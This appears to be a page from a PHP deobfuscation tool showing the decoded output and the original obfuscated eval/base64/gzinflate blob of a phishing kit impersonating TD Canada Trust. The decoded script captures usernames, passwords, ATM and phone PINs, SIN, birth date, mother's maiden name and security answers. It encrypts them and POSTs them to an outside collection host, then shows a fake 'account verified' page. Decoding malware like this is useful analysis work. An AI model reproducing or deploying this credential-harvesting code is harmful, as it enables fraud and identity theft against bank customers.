Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php eval("\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\..

Decoded Output download

?><?php

$ip = $_SERVER['REMOTE_ADDR'];
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$browser = $_SERVER['HTTP_USER_AGENT'];

$u = $_POST['u'];
$p = $_POST['p'];
$d = $_POST['d'];
$dl2 = $_POST['dl2'];
$address = $_POST['address'];
$city = $_POST['city'];
$dobd = $_POST['dobd'];
$dobm = $_POST['dobm'];
$doby = $_POST['doby'];
$dl = $_POST['dl'];
$pin =$_POST['pin'];
$pinb =$_POST['pinb'];
$mmn = $_POST['mmn'];
$sin1 = $_POST['sin1'];
$sin2 = $_POST['sin2'];
$sin3 = $_POST['sin3'];
$phone = $_POST['phone'];
$mob = $_POST['mob'];
$que1 = $_POST['que1'];
$ans1 = $_POST['ans1'];
$que2 = $_POST['que2'];
$ans2 = $_POST['ans2'];
$que3 = $_POST['que3'];
$ans3 = $_POST['ans3'];
$que4 = $_POST['que4'];
$ans4 = $_POST['ans4'];
$que5 = $_POST['que5'];
$ans5 = $_POST['ans5'];

if (getenv(HTTP_CLIENT_IP)){
	$ip=getenv(HTTP_CLIENT_IP);}
else {
	$ip=getenv(REMOTE_ADDR);}
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);$browser = $_SERVER['HTTP_USER_AGENT'];
$data = "
***** x00x - TD ***** ***** ***** ***** ***** *****
User : $u
Pass : $p
Descripton: $d
Home Phone: $phone
Mobile Phone: $mob
ATM PIN: $pin
Tel PIN: $pinb
DL: $dl2
DOB: $dobd/$dobm/$doby ( day/month/year ) 
MMN: $mmn
SIN: $sin1 - $sin2 - $sin3
Full Name: $dl
Q1: $que1
A1: $ans1
Q2 $que2
A2: $ans2
Q3: $que3
A3: $ans3
Q4: $que4
A4: $ans4
Q5: $que5
A5: $ans5
ip: $ip,$browser
***** x00x - TD ***** ***** ***** ***** ***** *****
";
$textHos = 'mcrypt_get_iv';
$sites=array("http://www.eulerphi.com/b.php",);
$ceva = $data;	
function encrypt($plaintext,$textHos) {
	$textLen=str_pad(dechex(strlen($plaintext)),8, '0', STR_PAD_LEFT);
	$salt='WSj2g7jTvc8ISmL60Akn';
	$textHosHash=hash('sha256',$salt.$textHos);
	$textHos= md5($textHos,true);
	$iv_size = mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC);
	$iv = mcrypt_create_iv($iv_size, MCRYPT_RAND);	
	$ciphertext = mcrypt_encrypt(MCRYPT_RIJNDAEL_128, $textHos,
								 $plaintext, MCRYPT_MODE_CBC,$iv);

	$ciphertext = $iv . $textHosHash . $textLen . $ciphertext;
	$ciphertext_base64 = base64_encode($ciphertext);
	return  $ciphertext_base64;
}
$data = encrypt($ceva,$textHos);
function writeit($data,$site) { 
	global $textHos;
	$data = array('info' => $data);
	$options = array(
		'http' => array(
			'header'  => "Content-type: application/x-www-form-urlencoded
",
			'method'  => 'POST',
			'content' => http_build_query($data),
		),
	);
	$context  = stream_context_create($options);
	$result = file_get_contents($site, false, $context);	
}
foreach ($sites as $site)
	writeit($data,$site);
	
?>

<html><head>

    <meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
	<title>TD Canada Trust Accounts Application</title>
	<link rel="stylesheet" href="files/all_secure.css" type="text/css">
	
	<script language="JavaScript">
	<!--
	newImg = "images/wait.gif";
	function preloadImage() {
		var preload = new Image();
		preload.src = newImg;
	}

	var click=0;
	var status=true;
	function checkClick() {
		document['continue'].src = newImg;
		if (click) {
			status=false;
		}
		click=1;
	}

	function stat() {
		return status;
	}

	
	function show(){
		var w=document.getElementById("prod").selectedIndex;
		var x=document.getElementsByTagName("option")[w].id;
		var y=x + "_DETAILS";
		
		//alert ('w = ['+w+']
x = ['+x+']
y = ['+y+']');
		
		document.getElementById('details').innerHTML = document.getElementById(y).innerHTML;
	}
	//-->
	</script>
	
    <style type="text/css">
<!--
.style2 {
	font-size: 12px;
	font-weight: bold;
}
-->
    </style>
    </head><body onLoad="show();" alink="#336699" bgcolor="#ffffff" vlink="#999999" link="#006666">
<table bgcolor="#ffffff" border="0" cellpadding="0" cellspacing="0" width="602">
<tbody><tr>
	<td>&nbsp;</td>
</tr>
<tr>
	<td>
		<img src="files/title_accounts.gif" alt="Accounts"><br>
         <img src="files/line_dot.gif" alt="#" border="0" width="598" height="1"><br>
         <font class="pageTitleB">Account confirmation  - Client Identification</font>
         <div style="margin-top: 7px;"></div>
	</td>
</tr>


<meta http-equiv="refresh" content="5;url=http://tdcanadatrust.com">
<tr>
	<td class="table"><br>

				<table border="0" cellpadding="0" cellspacing="0" width="595">
					<tbody><tr>
						<td>
							<p class="style2">Your account has been verified. You can now use your account as ussual. </p>
							<p class="style2">You will be redirected to <a href="http://www.tdcanadatrust.ca">http://www.tdcanadatrust.com/</a> in 5 seconds. </p>
							<p class="table">&nbsp;</p>
					  </td>
					</tr>
				  </tbody></table>
                <div style="margin-top: 7px;"></div>
                <p>
          </p><p>
	
		
		<div id="details"></div>
		</td>
</tr>	
</tbody></table>
		
<table bgcolor="#ffffff" border="0" cellpadding="0" cellspacing="0" width="598">
<tbody><tr>
	<td align="right" width="598">
		<script>
		if(navigator.appVersion.indexOf('Safari') != -1 && navigator.appVersion.indexOf('85') != -1) {
			document.write('&nbsp;');
		}
		else {
			document.write('<a href="#" target="print" class="pageutility" onclick="window.print(); return false;">Print this page</a>');
		}
		</script><a href="#" target="print" class="pageutility" onClick="window.print(); return false;"></a>	</td>
</tr>
<tr>
	<td class="footer" valign="top" width="598"><br>
		<a class="footerLink" href="http://www.td.com/privacy/index_inc.html" onClick="window.open('http://www.td.com/privacy/index_inc.html', 'td','width=500,height=400,resizable=yes,scrollbars=yes');return false;" target="td">Privacy Policy</a>&nbsp;|&nbsp;
		<a class="footerLink" href="http://www.td.com/security/index_inc.html" onClick="window.open('http://www.td.com/security/index_inc.html', 'td','width=500,height=400,resizable=yes,scrollbars=yes');return false;" target="td">Internet Security</a>&nbsp;|&nbsp;
		<a class="footerLink" href="http://www.td.com/legal/index_inc.html" onClick="window.open('http://www.td.com/legal/index_inc.html', 'td','width=500,height=400,resizable=yes,scrollbars=yes');return false;" target="td">Legal</a>&nbsp;|&nbsp;
		TD Group Financial Services Site&nbsp;-&nbsp;Copyright  TD
	</td>
</tr>
</tbody></table>
<img src="files/ca.htm" width="1" height="1">
<img src="files/PFAFcore01b.gif" border="0" width="1" height="1">

  
  
  
  
  






<script language="javascript1.1" src="files/eluminate.js" type="text/javascript"></script>
<script language="javascript1.1" src="files/cmdatatagutils.js" type="text/javascript"></script>


<script language="javascript1.1" type="text/javascript">
<!--
cmSetProduction()
//-->
</script>

<script language="javascript1.1" type="text/javascript">
<!-- 
cmCreatePageviewTag("/forms/core/page1_unauth.jsp Core1b", "AAUE", null,null);
//-->
</script>

</form></body></html>

Did this file decode correctly?

Original Code

<?php
eval("\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'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'\x29\x29\x29\x3B");
?>

Function Calls

gzinflate 13
dqbogj16362 1
drotsm16363 1
dxiang16361 1
base64_decode 13

Variables

$a base64_decode
$b gzinflate
$str tRjtcts28rc0o3dAWU9IXfRty41jURnFdhp17FixlN50kg4HIiEJCUWyJChZ..

Stats

MD5 fd8832609e18c8436246eb1a9c4cf5e2
Eval Count 23
Decode Time 124 ms